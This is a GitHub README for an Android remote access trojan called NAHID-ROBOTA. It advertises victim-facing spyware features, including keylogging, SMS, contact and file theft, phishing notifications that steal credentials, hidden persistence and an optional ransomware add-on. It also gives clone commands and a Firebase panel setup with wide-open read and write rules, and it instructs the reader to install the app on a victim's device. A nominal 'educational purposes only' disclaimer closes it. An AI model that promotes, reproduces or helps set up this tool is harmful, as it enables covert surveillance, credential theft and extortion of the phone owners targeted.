row-x / NAHID-ROBOTA

This Tools a Dangerous!

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

NAHID AFRIDY.PRO

A multifunctional Android Hacking with GUI based /NAHID/ without port forwarding.

Features

  • Read all the files of Internal Storage
  • Download Any Media to your Device from Victims Device
  • Get all the system information of Victim Device
  • Retrieve the List of Installed Applications
  • Retrive SMS
  • Retrive Call Logs
  • Retrive Contacts
  • Send SMS
  • Gets all the Notifications
  • Keylogger
  • Admin Permission
  • Show Phishing Pages to steal credentials through notification.
    • Steal credentials through pre built phishing pages
    • Open any suspicious website through notification to steal credentials.
  • Record Audio
  • Play music in Victim's device
  • Vibrate Device
  • Text To Speech
  • Turn On/Off Torch Light
  • Change Wallpaper
  • Run shell Commands
  • Get Clipboard text (Only When app's Activity is visible)
  • Launch Any URL (Only When app's Activity is visible)
  • Pre Binded with Instagram Webview Phishing
  • Runs In Background
    • Auto Starts on restarting the device
    • Auto Starts when any notification arrives
  • No port forwarding needed

Install system

  pkg install php
  pkg install php7
  git clone https://github.com/NAHID-AFRIDY/NAHID-ROBOTA
  cd NAHID-ROBOTA

How to Build

Firebase Setup

  1. Create an Firebase Account and afterwords create a new project with any name.

  2. Enable Firebase Database and Firebase Storage.

  3. In Firebase Database Click on the rules and set .read and .write to true

               ".read": "true",
               ".write": "true"
    
  4. In Firebase Storage allow reads and writes for all paths.

    •   rules_version = '2';
        service firebase.storage {
        match /b/{bucket}/o {
            match /{allPaths=**} {
               allow read, write 
              }
          }
       }
  5. Now Go to project overview and create an Android App and download the google-services.json file.

  6. Also create a web app and copy the config of webapp.

Panel Setup

  1. You can use Github Pages , Firebase Hosting or any Hosting Website (except 000webhost) for hosting the panel.
  2. Open index.html File and from line number 16 replace the config with your web app config which you have created on Step 6.
  3. Save the file , Your Panel Setup is completed.

Android Hacking

   ```
  1. Now compile the code with appt2.
  2. Install the app in victim's device and give all the permissions after that the connection will show up in /NAHID/.

NAHID AFRIDY.PRO

  1. Read , Delete files from victim's device
  2. Encrypt any file in victim's device
  3. Lock Victims Device with 4 digit Pin Code
  4. Capture Photo from Camera
  5. Get Sim Card Information
  6. Ransomware (encrypt all the files and show the notification demanding for ransom)
  7. Auto Start Permission for all chinese vendors.
  8. Hidden App without Foreground service notification (full stealth mode)

Support YT

  1. YouTube

Contract Me What'sApp

  1. What'sApp

DISCLAIMER

TO BE USED FOR EDUCATIONAL PURPOSES ONLY

The use of the NAHID AFRIDY is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read.

About

This Tools a Dangerous!

License:MIT License


Languages

Language:HTML 100.0%